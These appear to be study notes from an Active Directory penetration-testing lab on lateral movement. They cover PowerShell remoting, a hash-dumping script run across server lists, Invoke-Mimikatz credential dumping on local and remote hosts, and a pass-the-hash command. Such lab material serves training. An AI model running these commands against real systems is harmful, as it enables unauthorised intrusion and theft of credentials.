🔴Lateral Movement

Lateral Movement

It is like psexec on steroids

psexec

this is the tool from microsoft which helps us to remotely access the target host and also helps us to execute process on another system

just like psexec we can do powershell remoting in lateral movement. 2 types

* one-to-one  = enter-pssession
* one-to-many = invoke-command

Lateral movement is not only limitied to that , we can also do :-

- use to dump creds
- dump tickets
- use mimikatz (without dropping mimikatz.exe)
- passing hashes
- replaying hashes
- passing tickets
- use reflectivePEinjection script/code to execute mimikatz

Note :- scripts needs admin priviliges for dumping credentials from local machine

powershell remoting

one-to-one

find-localadminaccess

enter-pssession -computername dcorp-adminsrc.dollarcorp.moneycorp.local

check

whoami /priv

setting variable

$proc = get-process

$sess = New--pssession -computername dcorp-adminsrc.dollarcorp.moneycorp.local

one-to-many

execute commands or scriptblock

invoke-command -scriptblock {get-process} -computername (get-content <list of servers>)

invoke-command -scriptblock {whoami;hostname} -computername dcorp-adminsrv.dollarcorp.moneycorp.local

execute script from files

invoke-command -filepath C:\scripts\get-PassHashes.ps1 -computername (get-content <list of servers>)

execute stateful command

$sess = new-pssession -computername <name>

invoke-command -session $sess -scriptblock {$proc = get-process}

invoke-command -session $sess -scriptblock {$proc.name}

Invoke-Mimikatz

dump credentials on local machine

Invoke-Mimikatz -dumpcreds

dump credentials on remote machine

Invoke-Mimikatz -dumpcreds -computername @("system1","system2")

generate tokens from hash (pass the hash)

invoke-mimikatz -command '"sekurlsa::pth /user:administrator /domain:dollarcorp.moneycorp.local /ntlm:<hash> /run:powershell.exe